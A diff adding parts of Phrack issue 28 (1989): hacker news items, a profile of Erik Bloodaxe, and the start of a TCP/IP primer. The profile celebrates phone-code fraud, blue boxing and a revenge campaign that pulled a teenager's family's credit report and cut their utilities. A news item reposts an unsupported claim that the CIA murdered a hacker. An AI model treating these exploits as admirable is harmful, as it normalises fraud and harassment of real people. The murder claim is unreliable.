+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 4.
+    Grocery Store "Hackers" Sell Drugs And Women -- The VMB
+    (voice mailbox) system of a wholesale grocer in Los Angeles
+    was commandeered to a small band of "hackers," who used the
+    system to run a prostitution ring and disseminate data about
+    drugs.  Finally, valid VMB users complained that they could
+    not use the service since their passwords were invalidated.
+    An investigation disclosed that the "hackers" overrode
+    security features and acquired 200 VMBs for their own use.  -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+    - - - - - - - - 5.  Phone Phreaks Busted In Upstate New York
+    -- Once again it seems that Syracuse, New York is ripe for
+    the picking for law officials to grab hackers involved
+    computer related crimes.  In August the Federal
+    Communications Commission (FCC) put a local area police
+    sergeant in charge of contacting a list of local computer
+    users that were using a local long distance service that
+    offered national and international calling.
+
+    It seems that one user of the service contacted the company
+    about a large bill, $10,000, that he received.  The company
+    then put a trap on the code and accumulated a list of
+    unauthorized users to that code.  So far the local
+    authorities, the state police, and the FBI have been brought
+    in on the case.  They have been interviewing those on the
+    list and so far most have cooperated fully with the police
+    (most offenders are underage).  One user called Gunter has
+    even allowed the police to use his computer bbs accounts.
+    The service used by those caught (25 people) where to place
+    long distance calls to France, Dominican Republic, Kenya, and
+    Germany.  The callers also used the service to call locally
+    in Syracuse, as one person said that it cleaned up the line
+    noise.  - - - - - - - - - - - - - - - - - - - - - - - - - - -
+    - - - - - - - - - - - - - 6.  Bulletin Board Scanning Saves
+    Boy (August 24, 1989) --Undercover police in San Jose,
+    California, have been watching bulletin boards for several
+    years, looking for computer users who boast about their
+    criminal exploits.  It was such activity that led them to
+    Virginians Dean Ashley Lambey, 34, and Daniel T. Depew, 28,
+    who have been accused of conspiring to kidnap a young boy to
+    be filmed as they molested him and then killed him.  (Article
+    by Tracie L. Thompson of the San Francisco Chronicle.) - - -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+    - - - - - - 7.  German Hackers Attempt To End Smoking (August
+    29, 1989) -- On Saturday, August 26, 1989, ZDF (the second
+    German television station and one of the 2 nationwide
+    television channels) asked their viewers whether they thought
+    smoking should be banned in public areas.  The viewers could
+    reply by telephone, dialing one telephone number for "yes"
+    and another telephone number for "no."  Within a time frame
+    slot of 14 minutes, 52,942 telephone calls came in, with a
+    ratio of 54:46 in favor of prohibiting smoking.  This means
+    that 29,669 voted in favor of a prohibition, and 25,273
+    opposed it.
+
+    On Monday, August 28, 1989, a group of South German hackers
+    claimed to have manipulated the quota by dialing the "yes"
+    number with 83 personal computers at a rate of 4 times a
+    minute; virtually all of their calls came through so that
+    about the maximum of 4,648 "yes" votes came from their
+    computers.  These circumstances led to new results in the
+    poll: "Yes" = 25,021 and "No" = 25,273, giving the "no" group
+    a small majority.
+
+                           Story by Klaus Brunnstein - - - - - -
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+- 8.  Immigration Chief Proposes National Computer Screen (June
+22,
+    1989) --LA JOLLA, CA, -- The Commissioner of Immigration and
+    Naturalization, Alan C. Nelson, today proposed a nationwide
+    computer system to verify the identities of all job
+    applicants in order to halt the widespread use of fraudulent
+    documents by illegal aliens seeking jobs.
+
+    Mr. Nelson also suggested standardized identity cards for
+    immigrants so as to get fuller compliance with a 1986 law
+    prohibiting employment of illegal aliens.
+
+    Creating a national identity card and other ways of checking
+    legal status or identity have been repeatedly suggested in
+    Congress as tools in fighting unlawful immigration, but have
+    also been consistently rejected as potential infringements on
+    civil liberties.
+
+    The national computerized database on everybody is one bad
+    idea that simply refuses to stay dead, no matter how many
+    times we drive a stake through its heart -- if the INS didn't
+    resurrect it, the drug czar or the FBI would.  "Eternal
+    vigilance..."
+
+                    Story by Roberto Suro (New York Times) - - -
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+- - - - 9.  West German Computer Hackers Accused Of Spying For
+Soviets
+    (Aug. 17, 1989) -- Associated Press (Frankfurt) -- Three
+    computer hackers, suspected of giving the Soviet Union
+    information from military and industrial computers worldwide,
+    have been indicted on espionage charges, prosecutors said
+    yesterday.  The West German government called the breakup of
+    the spy ring, which gave the KGB secret data from 12
+    countries, including the United States, "a major blow" to the
+    Soviets.  In a four-page statement, Kurt Rebman, the chief
+    federal prosecutor, said it was the first time his office had
+    prosecuted hackers for endangering national security.  Taken
+    from the Boston Globe - - - - - - - - - - - - - - - - - - - -
+    - - - - - - - - - - - - - - - - - - - - 10. Challenge To
+    Phreaks! (August 31, 1989) -- Nippon Telegraph & Telephone
+    Corp. (Tokyo) is offering a $7,000 reward to any person or
+    organization that can invade its FEAL-8 private communication
+    and data system, according to an Associated Press report that
+    NTT America Inc. officials could not confirm.  The reward
+    offer supposedly expires 8/31/91.  No telephone number or
+    other information was included.  Taken from the Wall Street
+    Journal.  - - - - - - - - - - - - - - - - - - - - - - - - - -
+    - - - - - - - - - - - - - - 11. Shadow Stalker Loses Out
+    (August 7, 1989) -- A 17-year-old Michigan boy has been
+    charged with posting stolen long-distance telephone codes on
+    a bulletin board system operated in his home.  Brent G.
+    Patrick, alias "Shadow Stalker" online, was arraigned this
+    week on one count of stealing or retaining a financial
+    transaction device without consent.  Patrick was released on
+    $2,500 bond, pending his hearing.  The youth faces a maximum
+    of four years in prison and a $2,000 fine if convicted.  His
+    bulletin board, Wizard Circle, has been closed.  - - - - - -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+    - - - 12. Philadelphia Hackers Change Speed Limit -- Recently
+    an unknown hacker got into the computer that controlled the
+    speed limit on the Burlington-Bristol Bridge.  He proceeded
+    to change the speed limit from 45 m.p.h. to 75 m.p.h. A lot
+    of people were stopped and ticketed and judges say they will
+    not hear any appeals because, "the public should know better
+    than that no matter what the sign says."  The police claim to
+    have leads, however this is doubtful.  - - - - - - - - - - -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 13.
+    Two Story Jump To Escape From Secret Service (July 26, 1989)
+    -- Red Rebel, a known hacker in Florida was busted by the
+    United States Secret Service and local authorities.  It seems
+    that in attempt to to escape he actually jumped out a second
+    story window and ran for a while.  The Secret Service
+    confiscated two computers and a load of disks.
+
+    To make matters worse, similar to Oryan QUEST, Red Rebel is
+    not an American citizen and is likely to be deported.  Red
+    Rebel is charged with resisting arrest, interfering with
+    evidence, and something concerning credit card fraud.
+    Information provided by The Traxster.  - - - - - - - - - - -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 14.
+    Fraud Alert (September 1989) -- PBX fraud is busting out all
+    over.  Long distance carriers are being overwhelmed by
+    corporate customers demanding refunds for fraud perpetrated
+    on them.  No long distance carrier covers their customer's
+    long-term fraud.  If you got fraud you got to pay.  This is
+    not like stolen credit cards.  This is real serious stuff.
+    Thieves are dialing into 800 INWATS lines and, via auto
+    attendants, hacking their way to overseas.  The big calls go
+    to drug-related countries, especially Colombia, Pakistan,
+    Dominican Republic, and Ecuador.  But no one really knows
+    which countries are drug-related and which aren't.  Taken
+    from Teleconnect Magazine.  - - - - - - - - - - - - - - - - -
+    - - - - - - - - - - - - - - - - - - - - - - - 15. Motorola
+    Introduces Network Encryption System (August 4, 1989) --
+    Motorola Government Equipment Group (GEG) has introduced its
+    Network Encryption System (NES), which features the latest in
+    security services for the protection of Local Area Networks
+    (LANs).  Designed in accordance with Secure Data Network
+    System (SDNS) standards including SDNS electronic key
+    management, the NES is a flexible internet security solution
+    for Type I applications.
+
+    The NES is unique in COMSEC technology because the protocol
+    software is loaded via diskette.  The NES is installed in the
+    drop cable between the computer and the transceiver, or as a
+    gateway device separating a LAN from a backbone network.  The
+    product supports both DoD and ISO internet standards allowing
+    protection over wide area networks.
+
+    The initial product accommodates connection to IEEE 802.3 and
+    IEEE 802.4 medias.  Motorola Inc. has a Memorandum of
+    Agreement with the National Security Agency and anticipates
+    product endorsement in the first quarter of next year.  The
+    LAN product represents the first of a family of SDNS products
+    that will provide complete, interoperable system security
+    solutions.  Additional information on the NES can be obtained
+    from Joe Marino at (602) 441-5827.  - - - - - - - - - - - - -
+    - - - - - - - - - - - - - - - - - - - - - - - - - - - 16. The
+    Death of Shadow 2600:  No Accident (July 6, 1989) -- The
+    following is a message taken from The Central Office:
+
+                     89Jul06 from fdg @ The Central Office
+
+    MY CONDOLENCES TO DAVE FLORY'S FAMILY AND FRIENDS.  Do you
+    all realize WHY a 22 year old died?  It says one thing to me.
+    He was killed by some insane ex-CIA types.  Most likely under
+    orders from the idiots who tried to prosecute him in 1985.
+    This kind of thing is getting more common under President
+    Bush.  He ran the CIA, and he is now encouraging the same
+    dirty tricks to silence people who cause "problems."  Abbie
+    Hoffman was done in the same way.  A small hypodermic full of
+    prussic aced.  You will hear about more ex-hippies, yippies,
+    and hackers/phreaks dying mysteriously in the foreseeable
+    future.
+
+    You have been warned.  And who am I to know all this?
+    Believe me, friends, I am highly placed in the government.
+    You will see more friends die.  You may laugh now, but I
+    decided to leave a public message in hopes of saving a few
+    lives.
+                           Special Thanks to Epsilon
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+17. Legion Of Doom Members Raided In Atlanta (July 21, 1989) --
+    The Leftist, The Urvile, and The Prophet, all of the world
+    famous hacking group known as the Legion of Doom, were raided
+    on July 21, 1989.  The day in question is interesting because
+    two years prior, that was the same day that a nationwide
+    sweep netted over 80 hackers across the country including
+    famous names such as Oryan QUEST, Solid State, and Bill From
+    RNOC.
+
+    The charges against the LOD members range from toll fraud to
+    illegal entry into government computer systems, although as
+    it is told, the government systems were entered by the Urvile
+    and the other two had nothing to do with it.  Currently, all
+    three LOD-Atlanta members are still waiting to find out what
+    will happen to them as charges have not yet been brought
+    against them, very similar to what happened to the hackers in
+    1987.
+
+    It has been said by security personnel at Michigan Bell that
+    these LOD busts were a spinoff of the supposed arrest of Fry
+    Guy on July 19 for his role in the Delray Beach, Florida
+    probation officer scam (detailed last issue).  It is believe
+    that he had been working closely with LOD-Atlanta (especially
+    The Leftist) and when caught for the probation office scam,
+    he got scared and turned over what he knew about LOD.
+_____________________________________________________________________
+
+
diff --git a/phrack28/2.txt b/phrack28/2.txt
new file mode 100644
index 0000000..8834026
--- /dev/null
+++ b/phrack28/2.txt
@@ -0,0 +1,336 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #2 of 12
+
+                          ==Phrack Pro-Phile XXVIII==
+
+                       Created and Written by Taran King
+
+                          Done on September 23, 1989
+
+         Welcome to Phrack Pro-Phile XXVIII.  Phrack Pro-Phile
+was created to bring information to you, the community, about
+retired or highly important/ controversial people.  This issue,
+we bring you a long time member of the hacking community and a
+charter member of the Legion Of Doom...
+
+                                 Erik Bloodaxe
+                                 ~~~~~~~~~~~~~
+       Handle:  Erik Bloodaxe
+     Call Him:  Chris
+Handle Origin:  "Vikings" by ? (Don't remember)
+Date Of Birth:  20 years ago
+  Current Age:  20
+       Height:  5' 10"
+       Weight:  130
+    Eye Color:  Blue
+   Hair Color:  Brown
+   Blood Type:  A+
+  Sperm Count:  3
+    Computers:  Atari 400, various dumb terminals, CompuAdd Turbo XT
+
+Origins in Phreak/Hack World
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Way back when he was in 7th grade, some 8+ years back, Erik was
+quite a shoplifter.  As was the norm for 13 year-olds, he and a
+friend of his had stolen a stack of "girlie" magazines on one of
+their "raids."  One of these was High Society, which was toying
+with the idea of "recorded entertainment."  His friend was
+determined to hear this, but as the number was in New York, they
+decided to use the "strange phone service" his mother had signed
+up for to keep down the bill.  He explained it to Erik, "You dial
+this number and then tell the operator your number and the phone
+number."  They called it and told the operator a number that was
+100 off by mistake.  The operator said "Thank you," and the call
+went through.  Thus was born a "code-abuser."  They kept this
+information to themselves for several months.  When the service
+changed to an automated format (rather than operator service),
+they began to share their knowledge.  Word spread like wildfire.
+Interestingly enough, to this day, he can still backtrack 95% of
+all hacker-related code abuse from San Antonio back to himself as
+the originator of the information (well, a friend of a friend of
+a friend, etc..)
+
+Origins in Phreak/Hack BBSes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A friend of Bloodaxe's father bought a MicroModem II to get
+information from Dialog for his legal practice.  He still
+remembers the first time he used it.  His friend's dad used
+Dialog through Telenet.  Once he saw Telenet, he began trying
+various addresses.  One of the first things he ever did was get
+into a 212 VAX/VMS with GUEST/GUEST.  Erik had absolutely no idea
+what he was doing.  They were just guessing... typing things like
+"hello?", "catalog", and assorted other inane things.  They also
+called a few BBSes that came with the modem instructions (using
+their long-distance trick).  By the end of the weekend, they had
+worked their way to Pirates' Harbor (now TIMECOR) in 617, and
+Pirates' Cove 516.  From then on, he was hooked on modems.  Then,
+Wargames came out.  Embarrassing as it is for Erik, Wargames
+really did play a part in imbedding the idea of computer
+"hacking" in his little head.  (As it did for hundreds of others
+who are too insecure to admit it.)  He had his little Atari 400,
+but no modem (Hayes 300's were still hundreds of dollars).
+Another friend got an Atari Acoustic Coupler for his 800.  Born
+now were the Atari Warez D00dz.  For about a year, they did
+nothing but call Atari BBSes (and anything that had "Pirate" in
+its name).  They did stumble onto things like the Phone Booth in
+303, OSUNY (on an OHIO Scientific, days before it went down), and
+Mines of Moria (713).  Finally, he got an MPP modem.  Bloodaxe
+was on it day and night.  By this time they got into scanning.
+He was the one who checked everything out, as he was the one who
+was reading up on computer OSes at the UTSA library.  They were
+still big into games, and they ran across a really new game
+called Behind Jaggi Lines.  A guy named Devious Xevious traded
+them something called Software Blue Box for it, and gave them a
+BBS to call:  Pirate-80.  In 1983, Erik Bloodaxe entered the
+hack/phreak world.  He was blue boxing most of his calls by then.
+
+
+People in the Phreak/Hack World Met
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Bloodaxe has only met a handful "face-to-face," but has spoken
+with almost everyone around in the "golden-years," as he was
+heavily into conferences.
+
+
+Experience Gained In the Following Ways
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Mainly trial and error.  He would find a system, try to get in
+with simplistic username/password pairs, and then read help.  He
+also reads a lot.  He didn't speak out until he was sure of what
+he was talking about.  Erik never asked any questions, but always
+listened.  During the time he was a true "novice," he kept it
+fairly hidden, because he didn't want to seem stupid.
+
+Chris attributes the knowledge he has gained to himself.
+
+
+Memorable Phreak/Hack BBSes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Pirate-80  (He still call to check in on Scott)
+Sherwood Forest I, II, III
+RACS III (Tuc wouldn't let him on until years after he first called!!)
+Plovernet (Before and after the move)
+COPS (Where he got mail from Lex telling him to call Legion of Doom)
+WOPR (Getting closer to what BBSes would become)
+Hacknet (217)
+Legion of Doom (The ultimate in BBSes at the time)
+Crystal Palace (OSUNY lives again!)
+Newsnet (Yes, Sir Knight's BBS)
+Blottoland (Lair of the rodents)
+Ripco (A looooooong time ago, certainly not now)
+The Broadway Show ("Well, Mike was a little off, but so what.")
+Farmers of Doom! (Run from a pay phone, complete chaos)
+The Connection (A good private BBS)
+Catch-22 (A "better" private BBS)
+The Pipeline (718)
+Freeworld II
+Executive Inn (Re-instilled his faith in BBSes)
+The Phoenix Project (What he would want his BBS to equal or
+surpass in quality)
+Black Ice (A big leak; ask anyone at the Ameritech security
+convention)
+Pure Nihilism (Too much fun!)
+
+
+Schooling/Work
+~~~~~~~~~~~~~~
+Chris is currently struggling as a Computer Science major at
+University of Texas in Austin with intentions of a PhD,
+specializing in AI research.
+
+
+Accomplishments
+~~~~~~~~~~~~~~~
+Project Educate:  Was supposed to replace TAP after Tuc got fed
+                  up.  No one really knows what happened to it.
+
+LOD/H TJ:         Assorted work, major distributor.
+
+Numerous files.
+
+
+Phreak/Hack Groups
+~~~~~~~~~~~~~~~~~~
+LOD - In the original recruitment group, still in, still active.
+      What more can be said?  "LOD!" basically sums it all up.
+
+Camorra - Erik still gets mad about this.  He was asked by the
+          602 Scorpion to join a group that was being formed.  He
+          agreed, and he then came up with Camorra as a name.
+          The other members were Ax Murderer and 301 Executioner.
+          He got Dr. Who, Silver Sabre, and Pit Fiend to join and
+          Karl Marx, Tuc, and Videosmith were kind of
+          in/out-not-really-into-groups-but-we'll-hang-out kind
+          of members.  Most of them were deep into their
+          phones/computers.  They were planning a series of
+          files, such as the first Tymnet directory, a great
+          COSMOS file, a database of scans, etc.  Suddenly people
+          began appearing in the group that no one voted on.  The
+          group kind of split up into two factions, "us and
+          them."  Bloodaxe and Dr. Who just got mad and blew it
+          all off.  Pit Fiend got busted, and the Scorpion
+          disappeared.
+
+
+Interests
+~~~~~~~~~
+Packet networks (all), telco computers, Unixes, scanning (every night for
+almost 5 years!)
+
+
+Favorite Things
+~~~~~~~~~~~~~~~
+Beer--Tsing Tao, Michelob Dry, Coors Light.  (He am in college, you know!)
+Ecstasy--Grinding away (His teeth and his mind).
+Getting into a system on the first try.
+Unprotected crontab files.
+Scanning.  Anything, for anything, just doing it!
+A certain shapely 5'2" blonde who shall remain nameless.
+
+
+Most Memorable Experiences
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Alliance Teleconferencing way back when.  Tandem scanning out
+other sites in Houston and Dallas.  Transferring control to
+directory assistance ACD loops, and leaving it there until he
+wanted to run one.  Waking up the next morning and yelling into
+the phone at everyone else who had stayed on the conference and
+starting to talk again.  Conferences that lasted a week.
+Catching Draper in lies.  Busying out all the 408 DA's.  Boxing
+on a conference and trunking Karl Marx.  Calling random numbers
+in California and adding them in if they sounded like teenage
+girls.  "Giving" people unlimited trial usage of a "new" long
+distance service (LOD Telecommunications).  Jennifer, the
+Alliance operator who had it out for him ("This is that
+Bloody-axe person isn't it?").
+
+The Wharton School of Business Dec-10.  For nearly a month all
+the nation's top phreaks and hackers hung out on this system and
+used the chat program.  It was "the" place to be (kind of like an
+Altger Altos of the past, but no idiots).  Finally they killed
+the account, not because of abuse, but because they were loading
+the system down.  The students and operators were really cool
+about the whole thing.
+
+Finding (and spreading around everywhere) the White House Signal
+number.  A number of my friends kept calling it, posing as the
+mayor of San Antonio, Henry Cisneros, eventually causing the
+Secret Service call our high school, and telling the
+administrators to grab the people using the payphone to find out
+what the hell they were trying to do.
+
+Taking down almost every BBS in Alaska when he was denied access
+to one.  He pulled the poor kid's parents credit report, sent a
+copy to the kid over his modem, and disconnected the kid's phone,
+electricity, and water.  He then went around taking down the
+BBSes where the kid had friends (guilt by association).  Word got
+around the nation kind of fast.  Erik got on most BBSes without
+much trouble after all that.  He had a project to be on at least
+one BBS in every area code.  Bloodaxe had to get on
+non-hack/pirate ones in a few areas, but he managed to do it.  He
+stayed active on all of them for several months.  At one time, he
+was on about 140 BBSes!!!
+
+Reading a new edition of Newsweek with a story by Richard Sandza
+in it over a very crowded conference, then suggesting that he
+should get some Slim Whitman albums and Civil War Chess Sets via
+his Visa.  Erik pulled his history, to scare him, but lost it.
+When he pulled it later, there were nearly 100 inquiries, most by
+a certain Massachusetts Bank.  At least they gave him a good
+source for a follow-up article.
+
+Finding out that a certain long distance service (reselling AT&T
+WATS) would reset to a WATS dialtone when 2600 was blasted and
+then setting up a program to call MTV's 900 number repeatedly to
+ensure that Duran Duran would get severely beaten.
+
+Bloodaxe remembers boxing up a conference while waiting for the
+police to come, and fighting the impulse to run away.  He had
+tickets carded to Philadelphia International on a flight that
+afternoon (on the conference), and Telenet Bob was ready to meet
+Erik's flight, Mark Tabas was ready to send him a blank birth
+certificate, not to mention offers to stay with Dr. Who or
+Telenet Bob for as long as he needed to get settled.  Karl Marx
+talked him out of it though.  He was packed and ready to leave
+and become a new person in a new city.  Looking back, he's DAMN
+glad he didn't do it!
+
+Bloodaxe and Who-Bob deciding one fateful day to see if they
+could talk to each other's port on Telenet using an ID they had
+used for the LOD Telenet directory.
+
+
+Some People to Mention
+~~~~~~~~~~~~~~~~~~~~~~
+Dr. Who -- "My closest hacker counterpart.  We joke about being
+           60 with grandchildren, still having never met, calling
+           each other daily, with stories about how we just
+           defeated some ISDN service."
+
+The Mentor -- "My favorite drinking buddy.  The first hacker I
+              ever met face-to-face."
+
+Control C -- "One person who can almost equal me in outrageous
+              behavior.  Yes, Dan, I said almost!  Nyahh Nyahh!"
+
+
+Inside Jokes
+~~~~~~~~~~~~
+Lame, Lame, Lame
+
+LEGION OF DOOM IN DALLAS...FEDS BAFFLED
+
+
+Serious Section
+~~~~~~~~~~~~~~~
+Chris makes it a point to make huge filibusters on boards where
+he sees anything having even anything remotely related to
+carding.  Credit card fraud truly gives hacking a bad name.
+Snooping around a VAX is just electronic voyeurism... carding a
+new modem is just flat out blue-collar crime.  It's just as bad
+as breaking into a house or kicking a puppy!  He does everything
+he can (even up to turning off a number) to get credit
+information taken off a BBS.  He also tries to remove codes from
+BBSes.  He doesn't see code abuse in the same light as credit
+card fraud, (although the law does), but posted codes are the
+quickest way to get your board busted, and your computer
+confiscated.  People should just find a local outdial to wherever
+they want to call and use that.  If you only make local calls
+from an outdial, it will never die, you will keep out of trouble,
+and everyone will be happy.
+
+Marijuana, cocaine, LSD, MDMA (& analogs), and methamphetamine
+should be legalized and sold in a controlled fashion, regulated
+by the government.  Money spent currently on combatting drug
+traffic should be spent on the deficit, and on drug education and
+rehabilitation.  Making petty vices illegal only breeds crime;
+look at prohibition, look at gambling, look at how fast people go
+on the highway.  You cannot fight a losing battle, and therefore,
+must take on a new strategy.  Alcohol is the only drug he has
+ever imbibed and lost all consciousness and complete control of
+his actions.  He thinks it is THE most dangerous drug around, and
+anyone can get as much of it as they want with very little
+effort.  It is legal, but not everyone drinks.  If marijuana was
+legal not everyone would smoke it.  He wouldn't for one; he hates
+it.  However, farmers would no longer lose their farms; and most
+importantly, the economy would be boosted greatly.  Things have
+got to change.
+
+
+Are Phreaks/Hackers You've Met Generally Computer Geeks?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Of course not.  There are some that are, but generally there is
+an average sampling of the general population.  Hacking is just
+another hobby.  Most people who collect comic books are not all
+the same, most people who play backgammon are not similar in
+physical characteristics either.  The closest stereotype he could
+ever even say existed was 6 or so years ago, and that would be
+that most hackers then were Jewish and from New York state.  An
+obnoxious Texan WASP like Chris really stood out.
+
+
+Thanks for your time, Chris.
+
+                                                   Taran King
+________________________________________________________________
diff --git a/phrack28/3.txt b/phrack28/3.txt
new file mode 100644
index 0000000..ab6e73c
--- /dev/null
+++ b/phrack28/3.txt
@@ -0,0 +1,715 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #3 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>           Introduction to the Internet Protocols           <>
+       <>           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           <>
+       <>        Chapter Eight Of The Future Transcendent Saga       <>
+       <>                                                            <>
+       <>                    Part One of Two Files                   <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                        July 3, 1989                        <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Prologue
+~~~~~~~~
+Much of the material in this file comes from "Introduction to the
+Internet Protocols" by Charles L. Hedrick of Rutgers University.
+That material is copyrighted and is used in this file by
+permission.  Time differention and changes in the wide area
+networks have made it necessary for some details of the file to
+updated and in some cases reworded for better understanding of
+our readers.  Also, Unix is a trademark of AT&T Technologies,
+Inc. -- Just thought I'd let you know.
+
+If you are not already familiar with TCP/IP, I would suggest that
+you read "Introduction to MIDNET" (Phrack Inc., Volume Three,
+Issue 27, File 3 of 12) for more information.  That file is
+Chapter Seven of The Future Transcendent Saga and contains
+information about TCP/IP and how it is used within the National
+Science Foundation Network (NSFnet).
+
+
+Table of Contents - Part One
+~~~~~~~~~~~~~~~~~
+*  Introduction
+*  What Is TCP/IP?
+*  General Description Of The TCP/IP Protocols
+       The TCP Level
+       The IP Level
+       The Ethernet Level
+
+
+Introduction
+~~~~~~~~~~~~
+This article is a brief introduction to TCP/IP, followed by
+suggestions on what to read for more information.  This is not
+intended to be a complete description, but it can give you a
+reasonable idea of the capabilities of the protocols.  However,
+if you need to know any details of the technology, you will want
+to read the standards yourself.
+
+Throughout the article, you will find references to the
+standards, in the form of "RFC" (Request For Comments) or "IEN"
+(Internet Engineering Notes) numbers -- these are document
+numbers.  The final section (in Part Two) explains how you can
+get copies of those standards.
+
+
+What Is TCP/IP?
+~~~~~~~~~~~~~~~
+TCP/IP is a set of protocols developed to allow cooperating
+computers to share resources across a network.  It was developed
+by a community of researchers centered around the ARPAnet.
+
+First some basic definitions; The most accurate name for the set
+of protocols I am describing is the "Internet protocol suite."
+TCP and IP are two of the protocols in this suite (they will be
+described below).  Because TCP and IP are the best known of the
+protocols, it has become common to use the term TCP/IP to refer
+to the whole family.
+
+The Internet is a collection of networks, including the Arpanet,
+NSFnet, regional networks such as MIDnet (described in Chapter
+Seven of the Future Transcendent Saga), local networks at a
+number of University and research institutions, and a number of
+military networks.  The term "Internet" applies to this entire
+set of networks.
+
+The subset of them that is managed by the Department of Defense
+is referred to as the "DDN" (Defense Data Network).  This
+includes some research-oriented networks, such as the ARPAnet, as
+well as more strictly military ones (because much of the funding
+for Internet protocol developments is done via the DDN
+organization, the terms Internet and DDN can sometimes seem
+equivalent).
+
+All of these networks are connected to each other.  Users can
+send messages from any of them to any other, except where there
+are security or other policy restrictions on access.  Officially
+speaking, the Internet protocol documents are simply standards
+adopted by the Internet community for its own use.  The
+Department of Defense once issued a MILSPEC definition of TCP/IP
+that was intended to be a more formal definition, appropriate for
+use in purchasing specifications.  However most of the TCP/IP
+community continues to use the Internet standards.  The MILSPEC
+version is intended to be consistent with it.
+
+Whatever it is called, TCP/IP is a family of protocols.  A few
+provide "low-level" functions needed for many applications.
+These include IP, TCP, and UDP (all of which will be described in
+a bit more detail later in this file).  Others are protocols for
+doing specific tasks, e.g. transferring files between computers,
+sending mail, or finding out who is logged in on another
+computer.
+
+Initially TCP/IP was used mostly between minicomputers or
+mainframes.  These machines had their own disks, and generally
+were self-contained.  Thus the most important "traditional"
+TCP/IP services are:
+
+    - File Transfer -- The file transfer protocol (FTP) allows a
+      user on any computer to get files from another computer, or
+      to send files to another computer.  Security is handled by
+      requiring the user to specify a user name and password for
+      the other computer.
+
+      Provisions are made for handling file transfer between
+      machines with different character set, end of line
+      conventions, etc.  This is not quite the same as "network
+      file system" or "netbios" protocols, which will be
+      described later.  Instead, FTP is a utility that you run
+      any time you want to access a file on another system.  You
+      use it to copy the file to your own system.  You then can
+      work with the local copy.  (See RFC 959 for specifications
+      for FTP.)
+
+    - Remote Login -- The network terminal protocol (TELNET)
+      allows a user to log in on any other computer on the
+      network.  You start a remote session by specifying a
+      computer to connect to.  From that time until you finish
+      the session, anything you type is sent to the other
+      computer.  Note that you are really still talking to your
+      own computer, but the telnet program effectively makes your
+      computer invisible while it is running.  Every character
+      you type is sent directly to the other system.  Generally,
+      the connection to the remote computer behaves much like a
+      dialup connection.  That is, the remote system will ask you
+      to log in and give a password, in whatever manner it would
+      normally ask a user who had just dialed it up.
+
+      When you log off of the other computer, the telnet program
+      exits, and you will find yourself talking to your own
+      computer.  Microcomputer implementations of telnet
+      generally include a terminal emulator for some common type
+      of terminal.  (See RFCs 854 and 855 for specifications for
+      telnet.  By the way, the telnet protocol should not be
+      confused with Telenet, a vendor of commercial network
+      services.)
+
+    - Computer Mail -- This allows you to send messages to users
+      on other computers.  Originally, people tended to use only
+      one or two specific computers and they would maintain "mail
+      files" on those machines.  The computer mail system is
+      simply a way for you to add a message to another user's
+      mail file.  There are some problems with this in an
+      environment where microcomputers are used.
+
+      The most serious is that a micro is not well suited to
+      receive computer mail.  When you send mail, the mail
+      software expects to be able to open a connection to the
+      addressee's computer, in order to send the mail.  If this
+      is a microcomputer, it may be turned off, or it may be
+      running an application other than the mail system.  For
+      this reason, mail is normally handled by a larger system,
+      where it is practical to have a mail server running all the
+      time.  Microcomputer mail software then becomes a user
+      interface that retrieves mail from the mail server.  (See
+      RFC 821 and 822 for specifications for computer mail.  See
+      RFC 937 for a protocol designed for microcomputers to use
+      in reading mail from a mail server.)
+
+These services should be present in any implementation of TCP/IP,
+except that micro-oriented implementations may not support
+computer mail.  These traditional applications still play a very
+important role in TCP/IP-based networks.  However more recently,
+the way in which networks are used has been changing.  The older
+model of a number of large, self-sufficient computers is
+beginning to change.  Now many installations have several kinds
+of computers, including microcomputers, workstations,
+minicomputers, and mainframes.  These computers are likely to be
+configured to perform specialized tasks.  Although people are
+still likely to work with one specific computer, that computer
+will call on other systems on the net for specialized services.
+This has led to the "server/client" model of network services.  A
+server is a system that provides a specific service for the rest
+of the network.  A client is another system that uses that
+service.  Note that the server and client need not be on
+different computers.  They could be different programs running on
+the same computer.  Here are the kinds of servers typically
+present in a modern computer setup.  Also note that these
+computer services can all be provided within the framework of
+TCP/IP.
+
+-  Network file systems.  This allows a system to access files on
+   another computer in a somewhat more closely integrated fashion
+   than FTP.  A network file system provides the illusion that
+   disks or other devices from one system are directly connected
+   to other systems.  There is no need to use a special network
+   utility to access a file on another system.  Your computer
+   simply thinks it has some extra disk drives.  These extra
+   "virtual" drives refer to the other system's disks.  This
+   capability is useful for several different purposes.  It lets
+   you put large disks on a few computers, but still give others
+   access to the disk space.  Aside from the obvious economic
+   benefits, this allows people working on several computers to
+   share common files.  It makes system maintenance and backup
+   easier, because you don't have to worry about updating and
+   backing up copies on lots of different machines.  A number of
+   vendors now offer high-performance diskless computers.  These
+   computers have no disk drives at all.  They are entirely
+   dependent upon disks attached to common "file servers".  (See
+   RFC's 1001 and 1002 for a description of PC-oriented NetBIOS
+   over TCP.  In the workstation and minicomputer area, Sun's
+   Network File System is more likely to be used.  Protocol
+   specifications for it are available from Sun Microsystems.) -
+   remote printing.  This allows you to access printers on other
